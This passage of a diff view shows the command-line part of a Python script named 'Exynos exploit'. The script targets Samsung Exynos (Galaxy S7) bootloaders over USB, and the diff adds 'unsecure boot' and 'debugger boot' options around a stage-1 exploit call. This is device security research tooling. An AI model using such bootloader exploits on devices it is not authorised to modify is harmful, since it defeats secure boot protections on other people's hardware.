|
time.sleep(2)
|
||||||
|
self.connect_device()
|
||||||
|
|
||||||
|
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read())
|
||||||
|
time.sleep(2)
|
||||||
|
self.connect_device()
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
arg = argparse.ArgumentParser("Exynos exploit")
|
arg = argparse.ArgumentParser("Exynos exploit")
|
||||||
arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False)
|
arg.add_argument("--debug", action="store_true", help="Debug USB stack", default=False)
|
||||||
arg.add_argument("--boot", action="store_true", help="Unsecure boot", default=False)
|
arg.add_argument("--unsecure-boot", action="store_true", help="Unsecure boot", default=False)
|
||||||
|
arg.add_argument("--debugger-boot", action="store_true", help="Unsecure boot", default=False)
|
||||||
|
|
||||||
args = arg.parse_args()
|
args = arg.parse_args()
|
||||||
exynos = ExynosDevice()
|
exynos = ExynosDevice()
|
||||||
@ -629,13 +641,17 @@ if __name__ == "__main__":
|
|||||||
# exynos.usb_debug()
|
# exynos.usb_debug()
|
||||||
sys.exit(0)
|
sys.exit(0)
|
||||||
|
|
||||||
if args.boot:
|
if args.unsecure_boot:
|
||||||
exynos.unsecure_boot()
|
exynos.unsecure_boot()
|
||||||
sys.exit(0)
|
sys.exit(0)
|
||||||
|
|
||||||
|
|
||||||
stage1 = open("stage1/stage1.bin", "rb").read()
|
stage1 = open("stage1/stage1.bin", "rb").read()
|
||||||
exynos.exploit(stage1)
|
exynos.exploit(stage1)
|
||||||
|
|
||||||
|
if args.debugger_boot:
|
||||||
|
exynos.debugger_boot()
|
||||||
|
sys.exit(0)
|
||||||
|
|
||||||
exynos.setup_guppy_debugger()
|
exynos.setup_guppy_debugger()
|
||||||
exynos.dumb_interact()
|
exynos.dumb_interact()
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user